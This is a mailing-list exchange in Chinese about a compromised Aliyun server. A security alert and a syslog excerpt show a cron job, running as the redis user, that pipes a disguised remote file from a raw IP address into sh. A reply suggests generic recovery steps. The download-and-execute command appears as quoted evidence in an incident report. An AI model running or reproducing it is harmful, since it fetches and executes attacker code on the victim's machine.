2018-03-29 21:00 GMT+08:00 Hao Weibo <
haowei...@gmail.com>:
> 我的阿里云服务器报警:
>
> 进程名称: null
>
> 进程路径: /bin/dash
>
> 进程id: 20950
>
> 命令行参数: /bin/sh -c wget -q
http://185.198.57.167/img/Circle_AA.png -O - |sh
>
>
>
>
>
> 事件说明: 黑客通过应用系统原生下载指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因
> 解决方案: 建议立即及时加固系统密码,并排查异常指令
>
既然是 aliyun, 一般的解决思路:
0: 搜索是否有类似问题的处置方法
1: 加入官方 dindin 群咨询值班工程师
2: 备份自己的关键数据/配置到本地, 如果有镜像的话, 回滚到之前安全状态, 再增补那之后的配置
3: 备份后, 关闭并删除这个有问题的 ECS 实例, 重新申请, 部署
4: ...
方法总是比问题多的
>
>
>
> 通过ps -aux查找pid为20950的进程,但是没有找到。接着查询了系统日志
>
> $ cat /var/log/syslog
> 1 Mar 29 20:45:01 AY140430141633336379Z CRON[21596]: (redis) CMD (wget -q
>
http://185.198.57.167/img/Circle_AA.png -O - |sh)
> 2 Mar 29 20:45:01 AY140430141633336379Z CRON[21597]: (root) CMD (command -v
> debian-sa1 > /dev/null && debian-sa1 1 1)
>
> 一开始我怀疑是因为redis没设置密码的原因,但重新设置后,报警依然没有解除,系统日志里也继续出现那个关于redis wget的东西。
> 请问出现这些问题原因怎么排查呢,如何阻止它继续下去
>
> --
--
life is pathetic, go Pythonic! 人生苦短, Python当歌!
俺:
http://zoomquiet.io
授:
http://creativecommons.org/licenses/by-sa/2.5/cn/
怒: 冗余不做,日子甭过!备份不做,十恶不赦!
KM keep growing environment culture which promoting organization learning!